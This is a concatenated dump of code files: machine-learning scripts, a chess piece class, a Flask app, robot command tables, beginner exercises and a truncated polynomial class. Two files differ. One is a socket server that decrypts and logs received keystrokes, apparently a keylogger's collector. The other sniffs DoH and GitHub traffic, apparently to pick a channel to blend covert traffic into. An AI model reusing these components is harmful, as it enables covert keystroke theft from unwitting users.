omega_f.read()\n    object_data = psi_f.read()\n    \n    word_frames = [ frame.split('\\t') for frame in frame_data.split('\\n')[:-1] ]\n    documents = [ doc.split('\\t') for doc in document_data.split('\\n')[:-1] ]\n    subjects = [ word.split('\\t') for word in subject_data.split('\\n')[:-1] ]\n    predicates = [ word.split('\\t') for word in predicate_data.split('\\n')[:-1] ]\n    objects = [ word.split('\\t') for word in object_data.split('\\n')[:-1] ]\n    \n    num_frame = len(subjects)\n    frames = [[{}, {}, {}] for _ in range(num_frame)] # independent dict triples; '[[...]] * num_frame' would make every frame share the same three dicts\n    \n    for i in range(len(word_frames)):\n        s = int(documents[i][0])\n        p = int(documents[i][1])\n        o = int(documents[i][2])\n        fs = int(word_frames[i][0])\n        fp = int(word_frames[i][1])\n        fo = int(word_frames[i][2])\n        # The probability that sbj, prd or obj belongs to the frame\n        sbj_prob = float(subjects[fs][s])\n        prd_prob = float(predicates[fp][p])\n        obj_prob = float(objects[fo][o])\n        sbj_d = {s: sbj_prob}\n        prd_d = {p: prd_prob}\n        obj_d = {o: obj_prob}\n        frames[fs][0].update(sbj_d)\n        frames[fp][1].update(prd_d)\n        frames[fo][2].update(obj_d)\n\n    pprint.pprint(frames)\n    doc_f.close()\n    theta_f.close()\n    frame_f.close()\n    phi_f.close()\n    psi_f.close()\n    omega_f.close()\n\nif __name__ == '__main__':\n    construct_frame()\n","sub_path":"postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551761612","text":"import argparse\nimport logging\nimport sys\nimport time\n\nfrom tf_pose import common\nimport cv2\nimport numpy as np\nfrom tf_pose.estimator import TfPoseEstimator\nfrom tf_pose.networks import get_graph_path, model_wh\n\nlogger = logging.getLogger('TfPoseEstimatorRun')\nlogger.handlers.clear()\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='tf-pose-estimation run')\n    parser.add_argument('--video', type=str, default='./images/p1.jpg')\n    parser.add_argument('--model', type=str, default='cmu',\n                        help='cmu / mobilenet_thin / mobilenet_v2_large / mobilenet_v2_small')\n    parser.add_argument('--resize', type=str, default='0x0',\n                        help='if provided, resize images before they are processed. '\n                             'default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')\n    parser.add_argument('--resize-out-ratio', type=float, default=4.0,\n                        help='if provided, resize heatmaps before they are post-processed. 
default=4.0')\n    parser.add_argument('--mode', type=str, default=\"all\",\n                        help='all or triangle')\n    parser.add_argument('--background', type=bool, default=True,\n                        help='True or False')\n\n    args = parser.parse_args()\n\n    w, h = model_wh(args.resize)\n    if w == 0 or h == 0:\n        e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368))\n    else:\n        e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h))\n\n    # estimate human poses from a single image !\n    # image = common.read_imgfile(args.image, None, None)\n    video_file = args.video\n    cap = cv2.VideoCapture(video_file)\n    fourcc = cv2.VideoWriter_fourcc(*'DIVX')\n    output_filename = str(video_file)\n    if args.mode == \"all\":\n        output_filename = str(output_filename).replace(\".\", \"_all.\")\n    elif args.mode == \"triangle\":\n        output_filename = str(output_filename).replace(\".\", \"_triangle.\")\n    if args.background :\n        output_filename = str(output_filename).replace(\".\", \"_only_skel.\")\n    print(output_filename)\n    out = cv2.VideoWriter(output_filename, fourcc, 30.0, (int(cap.get(3)), int(cap.get(4))))\n\n    frame_count = 0\n    while cap.isOpened():\n        ret_val, image = cap.read()\n        frame_count+=1\n        if ret_val == False :\n            break\n        t = time.time()\n        humans = e.inference(image, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)\n        elapsed = time.time() - t\n        if frame_count % 10 == 0 :\n            print(\"frame_count:\\t\" + str(frame_count))\n            print('inference frame: %s in %.4f seconds.' % (frame_count, elapsed))\n        if args.background :\n            image = np.zeros(image.shape, np.uint8) + 255\n        if args.mode == \"all\" :\n            image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)\n        if args.mode == \"triangle\":\n            image = TfPoseEstimator.draw_triangle(image, humans, imgcopy=False)\n        out.write(image)\n    cap.release()\n    out.release()\n    cv2.destroyAllWindows()","sub_path":"run_video.py","file_name":"run_video.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"93508585","text":"from piece import Piece\n\nclass King(Piece):\n    def __init__(self, color, x, y, board):\n        super().__init__(color, x, y, board)\n        self.rank = \"king\"\n        self.has_moved = False\n        self.check = False\n\n        # Quick hack because castling is currently buggy when the CPU_player\n        # tries to do it, so this disables castling for it. 
Still legal, because\n        # you don't HAVE to castle :P\n        if self.color == 'black': self.has_moved = True\n    \n    \"\"\"\n    The runtime of the king's can_move_to function is O(1).\n    \"\"\"\n    def can_move_to(self, x, y):\n        if (self.board[x, y].piece and\n            self.board[x, y].piece.color == self.color):\n            return False\n\n        if (abs(self.x - x) < 2 and abs(self.y - y) < 2 and\n            not (self.x == x and self.y == y)):\n            return True\n\n        back_row = 7 if self.color == 'white' else 0\n        if not self.has_moved and not self.check: # check if can castle\n            if ((x, y) == (6, back_row) and\n                self.board[5, back_row].piece is None and\n                self.board[6, back_row].piece is None and\n                self.board[7, back_row].piece and\n                self.board[7, back_row].piece.rank == 'rook' and not\n                self.board[7, back_row].piece.has_moved):\n                return \"kingside\"\n            if ((x, y) == (2, back_row) and\n                self.board[1, back_row].piece is None and\n                self.board[2, back_row].piece is None and\n                self.board[3, back_row].piece is None and\n                self.board[0, back_row].piece and\n                self.board[0, back_row].piece.rank == 'rook' and not\n                self.board[0, back_row].piece.has_moved):\n                return \"queenside\"\n\n        return False\n    \n    \n    def is_in_check(self):\n        \"\"\"\n        Runtime is O(n^3) in the worst case due to the tile.get_new_coverage()\n        method.\n        \"\"\"\n        opponent = 'white' if (self.color == 'black') else 'black'\n\n        self.board[self.x, self.y].get_new_coverage()\n\n        return self.board[self.x, self.y].is_covered[opponent]\n\n","sub_path":"king.py","file_name":"king.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"296230767","text":"light_speed = 299792.458\nspeed = 16.9995\ndistance_from_sun_now = 21259598000\n\n# Programming problem 4(b)\ndef round_trip_time(day):\n    \"\"\"Calculates the round-trip communication time at a future date,\n    which is a number of days after today\"\"\"\n    time = day * 24 * 60 * 60\n    # seconds elapsed since today (24 h * 60 min * 60 s per day)\n    distance = distance_from_sun_now + speed * time\n    communication_time = 2 * distance / light_speed\n    return communication_time\n","sub_path":"labs/lab02/2.4 voyager.py","file_name":"2.4 voyager.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"369224623","text":"\"\"\" Chainer-based RNN implementations.\n\n    Important Notes:\n    * setting volatile to OFF during evaluation\n      is a performance boost.\n\"\"\"\n\nimport numpy as np\nfrom spinn import util\n\n# Chainer imports\nimport chainer\nfrom chainer import cuda, Function, gradient_check, report, training, utils, Variable\nfrom chainer import datasets, iterators, optimizers, serializers\nfrom chainer import Link, Chain, ChainList\nimport chainer.functions as F\nfrom chainer.functions.connection import embed_id\nfrom chainer.functions.normalization.batch_normalization import batch_normalization\nfrom chainer.functions.evaluation import accuracy\nimport chainer.links as L\nfrom chainer.training import extensions\n\nfrom spinn.util.chainer_blocks import EmbedChain, LSTMChain, RNNChain\nfrom spinn.util.chainer_blocks import MLP\nfrom spinn.util.chainer_blocks import CrossEntropyClassifier\n\n\nclass SentencePairModel(Chain):\n    def __init__(self, model_dim, word_embedding_dim, vocab_size, compose_network,\n                 seq_length, initial_embeddings, num_classes,\n                 mlp_dim,\n                 keep_rate,\n                 gpu=-1,\n                 ):\n        super(SentencePairModel, self).__init__(\n            embed=EmbedChain(word_embedding_dim, vocab_size, initial_embeddings, gpu=gpu),\n            
x2h_premise=RNNChain(model_dim, word_embedding_dim, vocab_size,\n seq_length, initial_embeddings, gpu=gpu, keep_rate=keep_rate),\n x2h_hypothesis=RNNChain(model_dim, word_embedding_dim, vocab_size,\n seq_length, initial_embeddings, gpu=gpu, keep_rate=keep_rate),\n h2y=MLP(dimensions=[model_dim*2, mlp_dim, mlp_dim/2, num_classes],\n keep_rate=keep_rate, gpu=gpu),\n classifier=CrossEntropyClassifier(gpu),\n )\n self.__gpu = gpu\n self.__mod = cuda.cupy if gpu >= 0 else np\n self.accFun = accuracy.accuracy\n self.keep_rate = keep_rate\n\n def __call__(self, x_batch, y_batch=None, train=True):\n ratio = 1 - self.keep_rate\n\n # x_prem = Variable(self.__mod.array(self.embed(x_batch[:, :, 0:1]), dtype=self.__mod.float32))\n # x_hyp = Variable(self.__mod.array(self.embed(x_batch[:, :, 1:2]), dtype=self.__mod.float32))\n\n x_prem = self.embed(x_batch[:, :, 0:1])\n x_hyp = self.embed(x_batch[:, :, 1:2])\n\n x_prem = Variable(self.__mod.array(x_prem, dtype=self.__mod.float32), volatile=not train)\n x_hyp = Variable(self.__mod.array(x_hyp, dtype=self.__mod.float32), volatile=not train)\n\n h_premise = self.x2h_premise(x_prem, train=train)\n h_hypothesis = self.x2h_hypothesis(x_hyp, train=train)\n h = F.concat([h_premise, h_hypothesis], axis=1)\n\n h = F.dropout(h, ratio, train)\n y = self.h2y(h, train)\n\n y = F.dropout(y, ratio, train)\n accum_loss = self.classifier(y, y_batch, train)\n self.accuracy = self.accFun(y, self.__mod.array(y_batch))\n\n return y, accum_loss\n\nclass RNN(object):\n \"\"\"Plain RNN encoder implementation. Can use any activation function.\n \"\"\"\n\n def __init__(self, model_dim, word_embedding_dim, vocab_size, compose_network,\n seq_length,\n num_classes,\n mlp_dim,\n keep_rate,\n initial_embeddings=None,\n use_sentence_pair=False,\n gpu=-1,\n **kwargs):\n \"\"\"Construct an RNN.\n\n Args:\n model_dim: Dimensionality of hidden state.\n vocab_size: Number of unique tokens in vocabulary.\n compose_network: Blocks-like function which accepts arguments\n `prev_hidden_state, inp, inp_dim, hidden_dim, vs, name` (see e.g. 
`util.LSTMLayer`).\n X: Theano batch describing input matrix, or `None` (in which case\n this instance will make its own batch variable).\n \"\"\"\n\n self.model_dim = model_dim\n self.word_embedding_dim = word_embedding_dim\n self.mlp_dim = mlp_dim\n self.vocab_size = vocab_size\n self._compose_network = compose_network\n self.initial_embeddings = initial_embeddings\n self.seq_length = seq_length\n self.keep_rate = keep_rate\n self.__gpu = gpu\n self.__mod = cuda.cupy if gpu >= 0 else np\n\n if use_sentence_pair:\n self.model = SentencePairModel(\n model_dim, word_embedding_dim, vocab_size, compose_network,\n seq_length, initial_embeddings, num_classes, mlp_dim,\n keep_rate,\n gpu,\n )\n else:\n raise Exception(\"Not implemented error.\")\n\n self.init_params()\n if gpu >= 0:\n cuda.get_device(gpu).use()\n self.model.to_gpu()\n\n def init_params(self):\n for name, param in self.model.namedparams():\n data = param.data\n print(\"Init: {}:{}\".format(name, data.shape))\n data[:] = np.random.uniform(-0.1, 0.1, data.shape)\n\n def init_optimizer(self, clip, decay, lr=0.001, alpha=0.9, eps=1e-6):\n self.optimizer = optimizers.RMSprop(lr=lr, alpha=alpha, eps=eps)\n self.optimizer.setup(self.model)\n\n # Clip Gradient\n self.optimizer.add_hook(chainer.optimizer.GradientClipping(clip))\n\n # L2 Regularization\n self.optimizer.add_hook(chainer.optimizer.WeightDecay(decay))\n\n def update(self):\n self.optimizer.update()\n\n def forward(self, x_batch, y_batch=None, train=True, predict=False):\n y, loss = self.model(x_batch, y_batch, train=train)\n if predict:\n preds = self.__mod.argmax(y.data, 1).tolist()\n else:\n preds = None\n return y, loss, preds\n\n def save(self, filename):\n chainer.serializers.save_npz(filename, self.model)\n\n @staticmethod\n def load(filename, n_units, gpu):\n self = SentenceModel(n_units, gpu)\n chainer.serializers.load_npz(filename, self.model)\n return self\n","sub_path":"python/spinn/plain_rnn_chainer.py","file_name":"plain_rnn_chainer.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"325493874","text":"### 요청을 받아서 응답만 하는 파일 ###\n\n# flask 기본 구성\n# 1. 모듈 가져오기\nfrom flask import Flask, render_template, request, jsonify\n# from ml import detect_lang\nfrom service.ml import detect_lang\nfrom service.db import selectAreaGps, selectAreaIndex\n\n\n# 2. flask 객체 생성\napp = Flask(__name__) # __name__내가 날 구동할 때 사용\n\n# 3. 라우팅 : 어떤 네트워크 안에서 통신 데이터를 보낼 최적의 경로를 선택하는 과정\n@app.route('/')\ndef home():\n # 기본 지역 정보를 최초 화면 구성시 반영하여 처리\n areas = selectAreaIndex()\n # 구 정보를 gus라는 키값으로 지정하여 렌더링시 전달하겠다\n return render_template('DOM.html', gus = areas, default=2)\n\n\n\n@app.route('/getAreaGps')\ndef getAreaGps():\n # 파라미터 받는부분 (get방식)\n gu_id = request.args.get('gu_id')\n print(gu_id)\n return jsonify(selectAreaGps(gu_id))\n # 데이터 추출\n # tmp = [ {'lat':37.55487682, 'lng':126.9696652}, {'lat':37.55487682, 'lng':126.9696652}, ]\n # json으로 응답\n # 응답 데이터에 html이 없다 => 전문통신, 미들 웨어서버, API서버\n # 무게중심이 client에 쏠려있다 => angularjs(구글), reactjs(페이스북,인스타그램), vue\n # return jsonify(tmp)\n\n# 3-1. 언어감지 처리 \n# GET 방식만 현재 되어 있는데, POST도 지원하겠다\n# 한개의 URL로 여러 메소드를 지원 => restful\n@app.route('/LangTypeDetect', methods=['GET','POST'])\ndef LangTypeDetect():\n if request.method == 'POST':\n # 1. 원문 데이터 획득 (GET,POST 방식으로 전달된 데이터 획득)\n # 인덱싱 기법을 사용하지 않고, 함수로 값을 추출한다\n # 오류 발생 시 에러가 나오지 않고 None으로 리턴되어 처리가능\n oriTxt = request.form.get('ori')\n if not oriTxt:\n return {'code':0, 'lang':'', 'desc':'원문데이터 누락'}\n # 2. 
언어 감지\n lang, desc = detect_lang(oriTxt)\n # 2-1. DB에 로그 처리\n # 3. 응답\n return {'code':1, 'lang':lang, 'desc':desc}\n else: # GET : 화면을 보여줌\n return render_template('index.html')\n\n# 4. 서버가동\n# run.py를 실행하면, __name__ => 'start(파일명)' 되므로 밑에 부분은 실행을 하지 않음\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"dum/ml_dl_project/service/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187837944","text":"from django.shortcuts import render\nfrom .backend import *\nfrom .forms import InputForm\n\n\ndef index(request):\n\t# Genereerib tavalise formi HTML's kui formi ei ole saadetud.\n\tif request.method != \"POST\":\n\t\tform = InputForm()\n\t\treturn render(request, \"website/index.html\", {'form': form})\n\n\telse:\n\n\t\t# Salvestab enda sisse formiga saadetud andmed ja teeb nendest DataFrame.\n\t\ttext = request.POST.get(\"text\")\n\t\tngrams = int(request.POST.get('n_gram'))\n\t\tmaatriks = request.POST.get(\"maatriks\")\n\t\tdf = make_dataframe(text)\n\t\t\n\t\t# Kasutades DataFrame'i loob andmed väljanäitamiseks.\n\t\tcounted_lemmas = count_attribute(df, \"lemmas\") # [['lemma', kogus], ['lemma', kogus]]\n\t\tletter_sequence = get_letter_sequence(df, ngrams) # [['tähejäriend', kogus], ['tähejäriend', kogus]]\n\t\tcounted_basewords_lemmas = get_it_all(df) # [['põhivorm', 'lemma', põhivormikogus], ['põhivorm', 'lemma', põhivormikogus]]\n\n\n\t\t# Genereerib uuesti formi, mida HTML lehele saata.\n\t\tform = InputForm()\n\n\t\tif maatriks == \"Ilma maatriksita\":\n\t\t\treturn render(request, \"website/index.html\", {'form': form, 'lemmas': counted_lemmas, 'letters': letter_sequence,'word_texts': counted_basewords_lemmas})\n\t\telse:\n\t\t\tadjacency_matrix, headers = get_adjandency_matrix(text, ngrams) # Annab välja maatriksi ja maatriksi tulpade pealkirjad.\n\t\t\treturn render(request, \"website/index.html\", {'form': form, 'lemmas': counted_lemmas, 'letters': letter_sequence,'word_texts': counted_basewords_lemmas, 'matrix': adjacency_matrix, 'header': headers})\n\n","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"232736140","text":"# float * speedType[6] = {normalVelFast, stopVelFast, standVelFast, normalVelSlow, stopVelSlow, standVelSlow }\nCMD_LIST = {\n 'dutyCycle': 0x03, #expected parameters: int[1], float32[1]\n 'setDirectionBit': 0x04, #expected parameters: int[1]\n 'removeDirectionBit': 0x05, #expected parameters: int[1]\n 'setMotorVoltage': 0x06, #expected parameters: int[1], float32[1]\n 'setPidParameters': 0x08, #expected parameters: float32[3]\n 'setRotatoinSpeed': 0x09, #expected parameters: float32[4]\n 'switchOnKinematicCalculation': 0xB,\n 'switchOffKinematicCalculation': 0xC, \n 'setMovementSpeed': 0xD, #expected parameters: float32[3]\n 'switchOnTrajectoryRegulator': 0xE,\n 'switchOffTrajectoryRegulator': 0xF,\n 'cleanPointsStack': 0x10,\n 'getStackState': 0x12,\n 'setMovementParameters': 0x15, #expected parameters: float32[5]\n 'setADCPinMode': 0x16, #expected parameters: int[1], int[1]\n 'getADCPinState': 0x17, #expected parameters: int[1]\n 'getAllADCPinsStet': 0x18,\n 'getDigitalPinState': 0x19, #expected parameters: int[1]\n 'getAllDigitalPinState': 0x1a,\n 'setOutputState': 0x1b, #expected parameters: int[1]\n 'getPinMode': 0x1c, #expected parameters: int[1]\n 'setPinModeExit': 
0x1d, #expected parameters: int[2]\n 'getDiscretePinState': 0x1e, #expected parameters: int[1]\n 'getAllDiscretePinStates': 0x1f,\n 'setDiscreteOutputState': 0x20, #expected parameters: int[1]\n 'determineCurrentPinMode': 0x21, #expected parameters: int[1]\n 'set12VState': 0x22, #expected parameters: int[1]\n 'switchOffPid': 0x23,\n 'switchOnPid': 0x24,\n 'setCorrectCoordinates': 0x25,\n\n # TODO': laying field side\n # TODO: beginning of the competition sign\n # TODO: implement commands listed below \n #getManipulatorState = 0x26 #changeSuckerState = 0x27 #expected parameters: int[1]\n #uploadPuck = 0x28\n #unloadAllPucks = 0x29 #expected parameters: int[1]\n #changeFishingRodState = 0x30 #expected parameters: int[1]\n #changeFishingLatchState = 0x2A #expected parameters: int[1]\n 'setManipulatorAngle': 0x31, # expected parameter: float[1]\n 'switchOffBelts': 0x33,\n 'startGame': 0x34,\n\n\n\n ## Small Robot\n 'on_sucker':0x3c,\n 'off_sucker':0x3d,\n 'rotate_cylinder_horizonal':0x42,\n 'rotate_cylinder_vertical':0x41,\n 'take_cylinder_inside_l':0x4A,\n 'take_cylinder_inside_r':0x4B,\n 'take_cylinder_outside':0x49,\n 'lift_up':0x44,\n 'store':0x45,\n 'out_cylinders':0x48,\n 'in+store':0x47,\n \n 'cylinder_taken':0x4c,\n \n #'drop':0x48,\n\n ## Big Robot\n\n #ball\n 'right_ball_down':0x64,\n 'right_ball_up':0x65,\n 'right_ball_drop':0x66, #expected parameters: float32[1] (angle)\n 'left_ball_down':0x67,\n 'left_ball_up':0x68,\n 'left_ball_drop':0x69,#expected parameters: float32[1] (angle)\n # cylinders\n 'front_down_cylinder_no':0x6A,\n 'front_up_cylinder_yes':0x6B,\n 'front_drop_cylinder_yes':0x6C,\n 'back_down_cylinder_no':0x6D,\n 'back_up_cylinder_yes':0x6E,\n 'back_drop_cylinder_yes':0x6F,\n 'both_sticks_open':0x70,\n 'both_sticks_close':0x71,\n 'us_sensors':0x75,\n # seesaw\n 'seesaw_hand_down':0x72,\n 'seesaw_hand_up':0x73,\n\n ## General\n 'echo': 0x01, # expected parameters: char[4] = 'ECHO'\n 'setCoordinates': 0x02, # expected parameters: float32[3]\n 'setCoordinates2': 0x99, # expected parameters: float32[3]\n 'go_to_with_corrections': 0x43,# expected parameters: float32[6], int[1]\n 'is_point_was_reached': 0x32, # no parameters, returns 0 or 1\n #'sensors_data': 0x3a, # no parameters, returns integer with first 6 bits sensor data\n 'getCurrentCoordinates': 0x13,\n 'getCurrentSpeed': 0x14,\n 'addPointToStack': 0x11, # expected parameters: float32[3], int[1]\n 'stopAllMotors': 0x40,\n 'start_flag': 0x80,\n 'off_wheels':0x81,\n 'on_wheels':0x82 ,\n\n\n\n ## Sucker commands\n 'on_coolers_suck':0x90,\n 'off_coolers':0x91,\n 'on_coolers_throw':0x92,\n 'on_mixer':0x93,\n 'off_mixer':0x94,\n 'up_front_seasaw':0x95,\n 'down_front_seasaw':0x96,\n 'open_door':0x97,\n 'close_door':0x98,\n 'up_back_seasaw': 0x9c,\n 'down_back_seasaw': 0x9b,\n # face\n 'funny_action_open': 0x77,\n 'funny_action_close': 0x78,\n # sensors\n 'sensors_data': 0x76,\n\n}\n\nREVERSED_CMD_LIST = dict((v,k) for k, v in CMD_LIST.items())\n","sub_path":"NewCommunication/Sucker/cmd_list.py","file_name":"cmd_list.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587361289","text":"import socket\nimport os\nfrom cryptography.fernet import Fernet\n\ndef escribir(tecla):\n\twith open('resumenteclas.txt','a') as archivo:\n\t\tif(tecla == 'Key.enter'):\n\t\t\tarchivo.write(tecla + os.linesep)\n\t\telse:\n\t\t\tarchivo.write(tecla)\n\t\tprint('tecla:' + tecla)\n\ndef cargar_clave():\n\treturn 
open(\"clave.key\",\"rb\").read()\n\n\nmi_socket = socket.socket()\nmi_socket.bind(('192.168.0.19',4205))\nmi_socket.listen(3)\nclave = cargar_clave()\nprint(clave)\nf = Fernet(clave)\nprint(\"hola mundo\")\nwhile True:\n\tconexion,addr = mi_socket.accept()\n\tprint(\"nueva conexion:\")\n\tprint(addr)\n\trespuesta = conexion.recv(1024)\n\tmensajedesencriptado = f.decrypt(respuesta)\n\tprint(str(mensajedesencriptado))\n\tescribir(str(mensajedesencriptado))\n","sub_path":"experimento con sockets/felipe/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570445102","text":"#Exercise 1.1.2\r\n\r\nwhile(True):\r\n    user_year = input('Enter a year to check:')\r\n    if (user_year == 'q'): break\r\n    try:\r\n        year = int(user_year)\r\n    except ValueError:\r\n        print('Invalid input')\r\n        continue\r\n    if year % 4 == 0 and (year % 100 != 0 or year % 400 == 0):\r\n        print(f'{year} is a leap year')\r\n    else:\r\n        print(f'{year} is not a leap year')\r\n    user_cont = input('Do you want to continue? Enter y(yes) or n(no) ')\r\n    if user_cont == 'y':\r\n        continue\r\n    else: break\r\n    \r\n\r\n#Exercise 1.1.3\r\n    \r\nwhile(True):\r\n    user_name = input('Enter a name: ')\r\n    user_sex = input('Enter a sex: ')\r\n    user_age = input('Enter an age: ') \r\n    if (user_name == '1' or user_sex == '2' or user_age == 'r'): break\r\n    try: \r\n        age = int(user_age) \r\n    except ValueError:\r\n        print('Invalid input')\r\n        continue\r\n    if user_sex == 'male' or user_sex == 'man':\r\n        print(f'His name is {user_name}. He is {age} years old.')\r\n    else:\r\n        print(f'Her name is {user_name}. She is {age} years old.')\r\n    user_cont = input('Do you want to continue? Enter y(yes) or n(no) ')\r\n    if user_cont == 'y':\r\n        continue\r\n    else: break\r\n    \r\n\r\n#Exercise 1.1.4\r\n    \r\nwhile(True):\r\n    user_n = input('Compute the factorial of: ')\r\n    if (user_n == 'q'): break\r\n    try:\r\n        n = int(user_n)\r\n    except ValueError:\r\n        print('Invalid input')\r\n        continue\r\n    i = 1\r\n    fact = 1\r\n    if n == 0 or n == 1:\r\n        print(f'The factorial of {n} is {fact}')\r\n    else:\r\n        while i <= n:\r\n            fact *= i\r\n            i += 1\r\n        print(f'The factorial of {n} is {fact}')\r\n    user_cont = input('Do you want to continue? Enter y(yes) or n(no) ')\r\n    if user_cont == 'y':\r\n        continue\r\n    else: break\r\n    \r\n\r\n#Exercise 1.1.5\r\n    \r\n\"\"\"for n in range(1000, 10000):\r\n    num = n\r\n    s = str(num)\r\n    setarr = set(s)\r\n    if len(s) == len(setarr):\r\n        print(s)\"\"\"\r\n    \r\n    \r\n    \r\n#Exercise 1.1.6\r\n    \r\nfrom math import sqrt\r\n\r\nwhile(True): \r\n    \r\n    user_n = input('Enter the upper bound of the range: ')\r\n    if (user_n == 'q'): break\r\n    try:\r\n        n = int(user_n)\r\n    except ValueError:\r\n        print('Invalid input')\r\n        continue\r\n    #i, j = 2, 0\r\n    for numb in range(1,n+1):\r\n        k = 0\r\n        for i in range(2, numb // 2+1):\r\n            if numb % i == 0:\r\n                k += 1\r\n        if k <= 0:\r\n            print(numb)    \r\n    \r\n    user_cont = input('Do you want to continue? Enter y(yes) or n(no) ')\r\n    if user_cont == 'y':\r\n        continue\r\n    else: break\r\n\r\n\r\n#Exercise 1.2.1 \r\n\r\nwhile(True): \r\n    user_name = input('Enter your last name, first name and patronymic: ')\r\n    if (user_name == '1'): break\r\n    try:\r\n        full_name = str(user_name)\r\n    except ValueError:\r\n        print('Invalid input')\r\n        continue\r\n    name_list = full_name.split()\r\n    new_name = name_list[1][0].title() + '.'\r\n    new_fathername = name_list[2][0].title() + '.'\r\n    new_fullname = name_list[0].title() + ' ' + new_name + 
new_fathername\r\n    print(new_fullname)\r\n\r\n    user_cont = input('Do you want to continue? Enter y(yes) or any other key for no ')\r\n    if user_cont == 'y':\r\n        continue\r\n    else: break\r\n\r\n\r\n\r\n\r\n#Exercise 1.2.2\r\n\r\nuser_string = input('Enter any string: ')\r\nnum_list = []    \r\nnum = ''\r\nsumm = 0\r\nfor char in user_string:\r\n    if char.isdigit():\r\n        num = num + char\r\n    else:\r\n        if num != '':\r\n            num_list.append(int(num))\r\n            summ = summ + int(num)\r\n            num = ''    \r\nif num != '':\r\n    num_list.append(int(num))\r\n    summ = summ + int(num)\r\n    \r\nprint(num_list, f' sum = {summ}')\r\n","sub_path":"Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"1676948","text":"#!/usr/bin/python\n\nimport sys, getopt\nfrom scapy.all import *\n\n#thresholds are number of packets over the poll time that is deemed enough traffic to do our business\nFF_IP_PATH = 'FFcloudflareIPs'\nFFDoH_counter = 0\nFFDoH_threshold = 50\nGIT_IP_PATH = 'GitHubIPs'\nGit_counter = 0\nGit_threshold = 50\nPOLL_TIME = 20\nINTERFACE = \"wlp0s20f3\"\n\ndef test_network():\n    \"\"\" Analyze the network for Firefox DoH and Github Traffic \"\"\"\n    \"\"\" Returns 1 if Firefox Doh Traffic meets threshold \"\"\"\n    \"\"\" Returns 2 if Github traffic meets threshold and DoH traffic did not \"\"\"\n    \"\"\" Returns -1 if both thresholds are failed \"\"\"\n    bpf = create_bpf_filter(FF_IP_PATH)\n    sniff_packets(INTERFACE, bpf, addFFcount)\n    if(FFDoH_counter > FFDoH_threshold):\n        return(1)\n\n    bpf = create_bpf_filter(GIT_IP_PATH)\n    sniff_packets(INTERFACE, bpf, addGitcount)\n    if(Git_counter > Git_threshold):\n        return(2)\n    \n    return(-1)\n\ndef create_bpf_filter(path):\n    \"\"\" Create a bpf filter for a list of IPs from a file \"\"\"\n    bpf_filter = \"ip and (\"\n    IPs = open(path)\n    addresses = IPs.readlines()\n    IPs.close()\n    for addr in addresses[:-1]:\n        bpf_filter = \"%snet %s or \" % (bpf_filter, addr)\n    bpf_filter = \"%snet %s)\" % (bpf_filter, addresses[-1])\n    return bpf_filter\n\n\ndef sniff_packets(interface, bpf_filter, process):\n    \"\"\" Sniff for traffic according to the filter \"\"\"\n    sniff(iface=interface, filter = bpf_filter, store=False, prn = process, timeout = POLL_TIME) # sniff comes from the star import; the bare name 'scapy' is never bound by 'from scapy.all import *'\n    \n\ndef addFFcount(pkt):\n    global FFDoH_counter\n    FFDoH_counter += 1\n    #print(\"DoH count: \" + str(FFDoH_counter))\n\ndef addGitcount(pkt):\n    global Git_counter\n    Git_counter += 1\n    #print(\"Git count: \" + str(Git_counter))\n\nif __name__ == \"__main__\":\n    print(test_network())","sub_path":"tmp/client/testnetwork.py","file_name":"testnetwork.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"581690332","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2010 Andrew Brown \n# Copyright (c) 2015 Stephen Larroque \n# See LICENSE.txt for license terms\n\n# TODO: use set instead of list? or bytearray?\n\nfrom ._compat import _range, _StringIO, _izip\n\nclass Polynomial(object):\n    '''Completely general polynomial class.\n    \n    Polynomial objects are mutable.\n    \n    Implementation note: while this class is mostly agnostic to the type of\n    coefficients used (as long as they support the usual mathematical\n    operations), the Polynomial class still assumes the additive identity and\n    multiplicative identity are 0 and 1 respectively. 
